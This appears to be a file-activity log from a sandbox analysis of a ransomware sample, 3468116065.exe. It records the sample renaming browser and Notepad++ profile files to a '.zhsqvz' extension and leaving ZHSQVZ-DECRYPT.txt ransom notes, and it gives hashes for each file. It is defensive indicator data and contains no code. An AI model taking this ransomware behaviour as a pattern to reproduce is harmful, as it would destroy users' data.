C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.zhsqvz
binary
MD5: 98b8bd8d2089758358242352b8b34993
SHA256: 2b4753b99b6df22f7bb1da448fb8d817ba7aef306b98d1f989b7d251cce048f1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css.zhsqvz
binary
MD5: c1980bc69183e87d2f15c7735ffe0382
SHA256: b7121b76ab06c1ed4cae5dfdd70c0a5788797867c007295573ee775f7be33141
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css.zhsqvz
binary
MD5: df604ae27153f76593691e2f436f37f1
SHA256: 1dd30fba4b301b931035ea7627ea2ebbbb078016124c8af285a64dccf64750ef
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablepositioning.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css.zhsqvz
binary
MD5: fec3d2be28e681e23108ec3fb0a5ce2a
SHA256: 37838394dcaeed7fe31532617b5870cf3174f0ce7da7819de494e81216aa1257
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css.zhsqvz
binary
MD5: 5224404f6b09e463757babcb39e4280a
SHA256: 5c0dc33c5e419897ec5e49d9af38a6c2f9a80c47b09fcb529e88278722326586
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablefloats.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disableforms.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disablebreaks.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css.zhsqvz
binary
MD5: 754c94a16184b0fdec16da36775b1363
SHA256: f50e220f9f3db59a258e908ce8ae72b4f132f180cd48236385cb162f26008ade
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css.zhsqvz
binary
MD5: 29ae97bfadb7954f5d8eb8c23c3fcbb9
SHA256: bef5ceb01c2b96f8d5a7e3c7c0841d045005468b627fd1825eef7a093570c657
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastbw.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\contrastwb.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css.zhsqvz
binary
MD5: b592e75df1d6715306e17557e14fa905
SHA256: 8a804c32a832187bdf9e5e094c33d92cda6fa9455509e0189cf454f60451d054
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css.zhsqvz
binary
MD5: bcb48bafe53f8fe7fcb89ffd13b7eae7
SHA256: 9c9ec60fe4875a32e38014931b69470033679b748ddf30a496d68359115e58dc
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\altdebugger.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\classid.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini.zhsqvz
binary
MD5: 238e3ec4b017b8b64c57366baeef70d5
SHA256: cdc3abafe63e4980897c43f7d699ec0e501fb2308f315dba3a9d2417b2ceb600
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css.zhsqvz
binary
MD5: 93cb62885f5ff0d55fa0c7d0727675a3
SHA256: 61408bd912d3a4a63fa2bafa74d9c85d618213fe4a914181c3c6eed45d46a12e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak.zhsqvz
binary
MD5: ab4f18c6de447ba281222b654a140f36
SHA256: d15160d488b37bcf4d3de22ea1d99391ce2c4da4caaf1a2b07ea933f4628c82e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\accessibility.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\speeddial.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat.zhsqvz
binary
MD5: d2eb14eff49e037d158371b155951e42
SHA256: 1922a6021fbb2124fed62ddf7f8149975aa126c45b46233d81350ac5a1209db5
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.zhsqvz
binary
MD5: 5ee1a29e5bc2dce665b8a31178219f45
SHA256: f5de158f12fb4bfb0acff5ab784ecbe6c899e7d39fd2c1b90dcd7dcc7f85da8e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat.zhsqvz
binary
MD5: 34b136bacf20616d0b5e480fc791e6a9
SHA256: 8302a99e6e2b527edc891d169cbe1d6f6284b52c0570802343f2bb95f0d92913
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat.zhsqvz
binary
MD5: 3ba8ba4c50f1867de394e7b3dbd5d156
SHA256: 5939e310f8151afee8879ce4a5e6a4cdaad8056a65ebea8f8a85a68bef951d06
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat.zhsqvz
binary
MD5: f5f4450989b95f1c87c0e0a8f656ff05
SHA256: 4586d3b4b20d8332c84f31d510a406ce468066690da0ce0efcd348877cc0e5fc
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat.zhsqvz
binary
MD5: 59e34d612a480ecf5af46a1398de43ee
SHA256: bb79036a8cab8c6ee7c3cabf3bb4a5628d4ff7f1b81a4d3b2d5bd6eabf1a4e06
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opthumb.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat.zhsqvz
binary
MD5: 0e41bf80eb2d82a688d1caa65056285d
SHA256: 2400278434fce1fb3dec52e410fd228ca0dd4090138552e70d9b481c550370c3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprand.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini.zhsqvz
binary
MD5: 3e97adea512a88707c16ac71d29b46f3
SHA256: a465c9110c4fde44cdc5ed0a5d89c4f31c0800161301dcb50723a17ea56268ee
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat.zhsqvz
binary
MD5: bb9229e01e38f5942618d9f52bd29261
SHA256: c18c8b82dd558638497aa9e368bcf78b316330c3c86ce754ba2dd58a80a3aece
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat.zhsqvz
binary
MD5: 51903feccd8542aa5f86cf610f48daa3
SHA256: 403236fc3d6bcda7659b6e67dc943ed570948b841f9ad3dd85d75e3625c85398
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini.zhsqvz
binary
MD5: 0f5698b2dc54edca953d96877621d764
SHA256: 87dc92ad9e636e0515d4a96bff9fec8b78e4f46008b5bb3faf02c109e38bea4f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\handlers.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat.zhsqvz
binary
MD5: 08d5a8e88c82e5a80d1b43cdc9eecdca
SHA256: 9cf0da4aa818270f3c2b9eb111372b0b0d77980735fd9ee410574a2c3043326c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat.zhsqvz
binary
MD5: 480aaff5473994854f185a352a159c45
SHA256: c4bdd537c8945c08779f7d00cf8231acaa7e68a506b156b00d45dbce6ed11482
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\download.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat.zhsqvz
binary
MD5: fac75368ecccb0a0c41115e75b262bf0
SHA256: 47c3c225d52369ae876c7462c98fc5e2cbf1eb54e7bc4f0f5254845bfc0ce226
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr.zhsqvz
binary
MD5: 224a5bba54ee41c25232ae5c4dfaf1dc
SHA256: ab7e5fee2257578e9b90d28f331954503827e0a1ee4cd05f447ef4203430b480
2180
3468116065.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: 45b707b15690214b2458e4a8d73742f4
SHA256: 5ab022ca260ba6f5ca57b2b3f21ad7e4104d6f77457404bbdcbfddcc55b892cf
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\cookies4.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\bookmarks.adr
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml.zhsqvz
binary
MD5: 12d9facc8e82a8c330d8db40145ad88f
SHA256: 883b94a95d7750a45c5cc29f533c2145fc91adf345847afa5f4f6427217acaf5
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Zenburn.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml.zhsqvz
binary
MD5: 5106b286d1c8e663f988db66cdbbfb54
SHA256: a9c8ccb08d17da0d81e41b66c7eb8a69acf7e5d9bb2238d9e11d67713c20436d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml.zhsqvz
binary
MD5: e50e9e4d372aea17decff5976062141c
SHA256: c732dd568618ebaad1702ed210a46f0b650eb1d0e5eb51e55f358450fe1c9cbd
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\vim Dark Blue.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml.zhsqvz
binary
MD5: c922d04bc75e17fe3871848d1a08db3d
SHA256: c52f4842bbdc4857084259161e64d19b6f8af606a97a9de50657919031ca20c3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Vibrant Ink.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Twilight.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml.zhsqvz
binary
MD5: 3d07383fa7970b763471ef72d6d772ab
SHA256: 3d882f063fea28ebf3310c8cbb11cfa3f625001200b32a3a39b0916f4bbbd6fd
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml.zhsqvz
binary
MD5: 0d2f9d51a1213672a46df9c3a6f91e7f
SHA256: 926e9b3b1e57a74e57175de45cf2fe819fd43853ab32f5b2af42101007fd3c5a
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Solarized-light.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml.zhsqvz
binary
MD5: 50c1a77edc71e2c98bd943591377ce2d
SHA256: 726520855a0288d9f82e32adda7b9689c5254a1c48ee220699644732237d45fa
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml.zhsqvz
binary
MD5: 39ce5a346273d846009f571416d40150
SHA256: 658b483363ed85a584ad05c5ecd0339b26b4cb97ebb7911d05d5612ba248f276
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Ruby Blue.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Plastic Code Wrap.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml.zhsqvz
binary
MD5: 216677765038a9834058d08ba9a37b45
SHA256: 3a5b842ddbc24205d477b44dc0c2fbddd81056a05b5afdeab73081d3c6f75935
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml.zhsqvz
flc
MD5: e021e4aaf7db37b783224ac41d03fd6d
SHA256: 7ada45a57cdd12f8ba896902156b6df035af64e41f734bc25d1ab5f3fe7dc6bf
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Obsidian.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Navajo.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml.zhsqvz
binary
MD5: 0b01c1d8a883ffc4c3bf0219984ac605
SHA256: 4d20b9a203682e6d8c8e219124c5ce611f9b4f4125f5609f647eec0751cbf256
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml.zhsqvz
binary
MD5: 633c750c537380f35ef3200a38942dc0
SHA256: 4265dfcb536e7e3c80c10887a603848307b5087f48be1087188bcf16a8cb3835
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\MossyLawn.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Monokai.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml.zhsqvz
binary
MD5: 4e1cd0ea91299b832087c9fac0761039
SHA256: 5e2a8b960a17cc81cd4e39c923eebfed28c5ab2a9b662184273a32244e3d0c66
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Mono Industrial.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml.zhsqvz
binary
MD5: 3d6aa3c0368eda397e2cf0fdd5989d79
SHA256: 785e97329d2467ab931dd25a94b294f008ecb779bdb92c32215f169e0d1a632c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\khaki.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml.zhsqvz
gpg
MD5: 8ae2087527de7e51374bfc9a59b1b8f5
SHA256: cc5a617cda5232bcd67125ee9788eb478e1e85857ce3a3c2a7c16f58513f35af
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\HotFudgeSundae.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.zhsqvz
binary
MD5: 954676eafa9587226094c7cf64477263
SHA256: 6e9d0b46c5a5d86e6fb3e9b74b16fe6ac816e847446a38a0329943c280918ff6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml.zhsqvz
binary
MD5: 1b9cfefee594e538296c7151bbbd80a9
SHA256: c34d68d9a36e05d8714dd3b4e0ef79aa5558d83184159799ead664e317c00e0b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Deep Black.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml.zhsqvz
binary
MD5: e0c3156e717efdf3728faefcd82502d0
SHA256: fb6fb5b590aa7934a3a4387646c7b5a5f145373293a2d7b75bd0afb9fdd633d8
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Choco.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml.zhsqvz
binary
MD5: 99df3a7e5670f55743d22d98f6d87667
SHA256: bca0c20f907aa478193b84401e89658a76b516eac63987bc3a47724ae8f006a4
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Black board.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml.zhsqvz
binary
MD5: c36f8dd30fd91a5be6b05688f34eaf44
SHA256: 57c75dc04fbad0a4a43a35fec7a90acd05ff6bebacddec73cb4df2365c7ee211
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Bespin.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml.zhsqvz
binary
MD5: 19431846d491fe61439135a591ab47c7
SHA256: 296bfa069516ed8499d2ab2de9010d94cc8efbb0c573ac96400c2a9eb7dc5cd6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\functionList.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml.zhsqvz
binary
MD5: da49605b1d3d3b84e9069c34ab447a3d
SHA256: 774e53beb4692b6d288342c648a5c016705bd30dbe0d98af2847c1622187b88e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\contextMenu.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini.zhsqvz
binary
MD5: 7c4aa4c1c34525f3cb2bed2d39e0b6f3
SHA256: 0006f89c207bdbe396b77d0cf3140724c13eaab3ea33307dbaca5e9ad3270f9e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Notepad++\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\SystemExtensionsDev\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\profiles.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json.zhsqvz
binary
MD5: ee8f2eb8a670c17a69fbcbe49ba75d1e
SHA256: 7a9f93680c7cb884bf4e8ed0be6a8459b35ee8d69934ad9f084546d8ad67e562
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\xulstore.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite.zhsqvz
binary
MD5: 09c93a42877dba05819642152958c8b3
SHA256: ca9ad17d4ff74eb9c9a4f9c11a51408869abd2b924746a6df0435d7a9d5b68f3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\webappsstore.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json.zhsqvz
binary
MD5: 572508b3e1ad11f1b1a86609c6ccbc00
SHA256: 11c3ad4edf7fe58c654f5c15c1ee7327ea18d1eb0f1a39f87ba31c005fced61e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\tabs.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\toFetch\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json.zhsqvz
binary
MD5: 9e2dbbc34b5f64813a4e7fe19798a27c
SHA256: b81157062c851f465b20b844d3b8fcedba414928bddf83d94dc72aa8dd3eaaa7
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\tabs.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json.zhsqvz
binary
MD5: 3b7aaef42cc3166ec249732956bfcee9
SHA256: c81028a8ef32f4b2341b9b6b0e03249099ed218a5128c4eb22422a1e6310c7a2
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\failed\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\weave\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\times.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite.zhsqvz
binary
MD5: 80343bf97aba6fddd5a3d67791fe4602
SHA256: d0eb3368668d7c0b6a57ccd8a0aae846a6a72cad7df11663fd8e1dab6c9736d1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite.zhsqvz
binary
MD5: 1c7392ffcb296e3b04cf7958f0cd73c5
SHA256: 94b73ae7ec4b9c0caa35fbfc9c35843e1efa4cacedb4244de4a07e8a192af488
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\temporary\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\727688008bsleotcakcliifsittsr%.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite.zhsqvz
binary
MD5: a92ee5d85e2fdad1eb6156f398c27b5b
SHA256: 399eb6b6aac68c55a2e497afebf4c27fb9acbe95b468fcbfcbf12912b7e3c2b1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3899588440psinninpiFn2g%.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.zhsqvz
binary
MD5: 7961cd338e60749e9ac543ee3b2a1803
SHA256: f8fd7067b1141fb08aaa8b6b0e16fb4cb0a82aaf5b19db6cc902f3fd4d443645
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
